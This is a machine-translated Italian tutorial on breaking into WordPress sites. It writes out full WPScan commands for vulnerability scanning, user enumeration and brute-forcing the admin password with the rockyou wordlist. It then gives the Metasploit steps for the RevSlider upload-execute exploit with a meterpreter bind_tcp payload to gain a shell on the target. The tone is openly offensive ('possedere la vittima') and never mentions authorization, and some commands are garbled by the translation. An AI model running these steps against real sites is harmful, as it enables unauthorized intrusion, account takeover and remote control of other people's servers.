Machine Translated by Google

Pagina | 1

Test di penetrazione di WordPress

utilizzando WPScan e Metasploit

Autore = Behrouz Mansoori

E-mail : mr.mansoori@yahoo.com
Machine Translated by Google

Pagina | 2

In questo tutorial, ti mostrerò come utilizzare WPScan e Metasploit per hackerare un sito Web WordPress

facilmente. Imparerai come scansionare i siti WordPress per potenziali vulnerabilità, di cui approfittare

vulnerabilità per possedere la vittima, enumerare gli utenti di WordPress, account WordPress di forza bruta,

e carica la famigerata shell meterpreter sul sistema del target usando Metasploit Framework.

In breve, ti spiego molto bene quanto segue:

• Come utilizzare WPScan per trovare le vulnerabilità da sfruttare in modo efficace

• Come pensare in modo critico ed esaminare potenziali vulnerabilità

• Come sfruttare le vulnerabilità rivelate da WPScan

• Come enumerare utenti/account di WordPress

• Come forzare la password dell'account amministratore di WordPress

• Come utilizzare Metasploit per sfruttare una vulnerabilità critica del plug-in scoperta da
WPScan

• Come utilizzare un payload in Metasploit per sfruttare WordPress

Apri WPScan

Puoi aprire un terminale e digitare wpscan o andare su Applicazioni > Applicazione Web

Analisi > WPScan

Machine Translated by Google

Pagina | 3

Aggiorna il database delle vulnerabilità del tuo WPScan.

La prima cosa da fare prima è assicurarsi che il database delle vulnerabilità di WPScan sia aggiornato.

Digitare il comando successivo nel terminale per aggiornare il database:

wpscan --aggiornamento

Se hai questo problema

Inseriremo un altro comando

wpscan --update --verbose

Machine Translated by Google

Pagina | 4
Machine Translated by Google

Pagina | 5

Inizia a scansionare il sito Web per trovare vulnerabilità di WordPress/plugin/temi

Digita il comando successivo nel terminale per scansionare potenzialmente il sito Web di destinazione

vulnerabilità sfruttabili:

wpscan —url targetwordpressurl.com

Machine Translated by Google

Pagina | 6
Machine Translated by Google

Pagina | 7

Come possiamo vedere, WPScan ha scoperto vari fatti sul sito Web del target inclusi e non
limitato a:

• XMLRPC.php (XML-RPC Interface) è aperto allo sfruttamento come il brute force e

pingback DDoS.
• Viene identificata la versione core di WordPress: 2.0.1

• 15 Vulnerabilità principale di WordPress:

o wp-register.php Parametri multipli XSS

o Bypass di sicurezza della configurazione del modulo admin.php

o Scansione porta interna/esterna dell'API Pingback XMLRPC

o Problemi aggiuntivi di pingback XMLRPC

o wp-includes/comment.php Ignora le restrizioni antispam

o Multiple Cross-Site Scripting (XSS) in request_filesystem_credentials()

o Cross-Site Scripting (XSS) in wp-admin/plugins.php

o wp-includes/capabilities.php Elimina amministratore autenticato in remoto

Azione Bypass

o Amministratore remoto autenticato Aggiungi bypass azione

o Denial of Service (DoS) con password lunga

Machine Translated by Google

Pagina | 8

o Falsificazione di richieste lato server (SSRF)

o Pubblica via e-mail Verifica mail.example.com per impostazione predefinita

o RSS e Atom Feed Escape

o Application Denial of Service (DoS) (senza patch)

o Cancellazione di file arbitraria autenticata

• Identificato il tema WordPress e la versione utilizzata.

Il Rosso! segno si riferisce a un componente specifico di un sito che è vulnerabile allo sfruttamento.
Machine Translated by Google

Pagina | 9

Come WPScan rivela che il sito ha:

• Modulo di contatto vulnerabile con bypass di sicurezza, caricamento file RCE disponibile

(Riferimenti: WPVulnDB, SecurityFocus, CVE MITRE, PacketStormSecurity)

• LAyerSlider vulnerabile con un CSRF di modifica dello stile, file di attraversamento del percorso remoto

Accesso, CSRF / XSS archiviato autenticato e SQL Injection disponibili (Riferimenti:

WPVulnDB, PacketStormSecurity, secunia, wphutte)

È importante notare che anche quando WPScan non è in grado di determinare una versione di un plug-in specifico, esso

stamperà un elenco di tutte le potenziali vulnerabilità. È utile prendersi il tempo per rivedere, visitare

i siti di riferimento individualmente ed eseguire questi exploit per determinare se il sito di destinazione lo è

vulnerabile a loro o meno. Solo perché non è possibile determinare una versione del plug-in non significa che il file

il sito non è vulnerabile.

Machine Translated by Google

Pagina | 10

È utile prendersi del tempo per esaminare le vulnerabilità, visitare i siti di riferimento individualmente e

eseguire questi exploit per determinare se il sito di destinazione è vulnerabile o meno. Solo

poiché non è possibile determinare una versione del plug-in non significa che il sito non sia vulnerabile.

Siti di riferimento da utilizzare per condurre ricerche su potenziali vulnerabilità

• https://wpvulndb.com
• https://packetstormsecurity.com
• https://www.exploit-db.com

• https://cve.mitre.org

• http://www.securityfocus.com
• http://cxsecurity.com

Un esempio interessante

Supponiamo che il risultato della scansione di un sito sia questo:

Machine Translated by Google

Pagina | 11

Il sito del bersaglio è vulnerabile a due exploit critici di Slider Revolution:

• Inclusione di file locali

• Caricamento shell

Possiamo eseguire questi attacchi facilmente.

Ad esempio, possiamo utilizzare Slider Revolution Upload Execute Exploit tramite Metasploit.

Metasploit ha già questo exploit pronto per l'uso per il tuo piacere.

Un'altra cosa prima di procedere con il tutorial di Metasploit Framework:

Come enumerare utenti/account di WordPress

Lo strumento di enumerazione utente/account di WordPress integrato in WPScan viene distribuito per ottenere a

elenco degli utenti WordPress registrati dal sito Web del target.

L'enumerazione degli utenti è fondamentale quando un hacker deve ottenere l'accesso a un determinato target tramite

forzatura bruta dell'account amministratore di WordPress del target.

Lo strumento di enumerazione degli utenti WPScan eseguirà la scansione del sito di destinazione per gli autori di WordPress e

nomi utente.

Distribuisci il comando successivo per enumerare gli utenti di WordPress:

• wpscan —url targetwordpressurl.com –enumerate u

Machine Translated by Google

Pagina | 12

Come possiamo vedere, lo strumento di enumerazione degli utenti di WPScan ha identificato:

• Due account utente, in particolare il più importante: admin (il nome dell'amministratore predefinito è rimasto

invariato)

• admin è ancora in uso.

• Il secondo account può possedere privilegi di amministratore, può forzare entrambi contemporaneamente se necessario.

Come forzare la password dell'account amministratore di WordPress

Digita il comando successivo nel terminale per forzare bruta la password per l'amministratore utente:

• wpscan –url targetwordpressurl.com –wordlist /usr/share/wordlists/rockyou.txt (sostituisci

elenco di parole e posizione a tua scelta) –username admin (il nome utente del tuo target) –threads 2

(sostituisci il numero di thread che desideri utilizzare)

Per una versione pulita senza quelle fastidiose parentesi che ho appena usato, ecco il comando:

• wpscan —url targetwordpressurl.com–wordlist /usr/share/wordlists/rockyou.txt –username

admin – thread 2

Alla fine, potresti vedere la password elencata nel terminale accanto all'ID di accesso.
Machine Translated by Google

Pagina | 13

Avvia Metasploit Framework tramite il desktop della distribuzione Linux

Cordiali saluti, anche se questa vulnerabilità del plug-in RevSlider è stata corretta, molti WordPress

i siti Web là fuori non hanno ancora aggiornato il loro plug-in RevSlider, il che li rende suscettibili

essere di proprietà di 1337 hax0rs.

Digita i comandi successivi nel terminale:

• revslider di ricerca

• utilizzare exploit/unix/webapp/wp_revslider_upload_execute

• mostra le opzioni
Machine Translated by Google

Pagina | 14

È necessario impostare l'URL del sito Web di destinazione utilizzando il comando successivo:

set rhost 127.0.0.1/targetsiteurl.com (sostituisci l'indirizzo IP con l'IP del sito o semplicemente sostituisci

URL del sito di destinazione.)

Devi impostare il percorso di base dell'URI del tuo target per la sua applicazione WordPress usando il seguente
comando:

set targeturi /wordpress (sostituisci /wordpress con il percorso della directory individuale se WordPress non lo è

installato in /)

Usa un carico utile

Dobbiamo impostare un carico utile. Nella nostra dimostrazione, utilizziamo il famigerato payload meterpreter per pwn

il nostro obiettivo.

Digita i comandi successivi in Terminale:

• impostare il payload php/meterpreter/bind_tcp

• mostra le opzioni
Machine Translated by Google

Pagina | 15

Assicurati che rhost per entrambe le opzioni del modulo e del carico utile sia riempito con l'IP del sito di destinazione

indirizzo/URL.

Puoi controllare/confermare se il target è vulnerabile digitando il comando "check" nel file

terminale.

Riceveresti il messaggio di risposta: "Il bersaglio sembra essere vulnerabile". Lo sappiamo già

quello, ma solo per ricontrollare.

Ora per ottenere la shell meterpreter sul sistema del bersaglio, digita semplicemente il comando "exploit" in

il terminale.

In caso di successo, nel terminale verranno visualizzati i seguenti messaggi:

• “127.0.0.1 (Indirizzo IP di destinazione sostituito) – Il nostro payload è su /wordpress/wp

contenuto/plugin/revslider/temp/upload“

• "127.0.0.1 (Indirizzo IP di destinazione sostituito) – Payload di chiamata..."

• "oCDNSJ.php eliminato"
Machine Translated by Google

Pagina | 16

• "Eliminato ../revslider.zip"

Spero che la formazione sia utile

Mr.mansoori@yahoo.com

Instagram.com/Behrouz_mansoori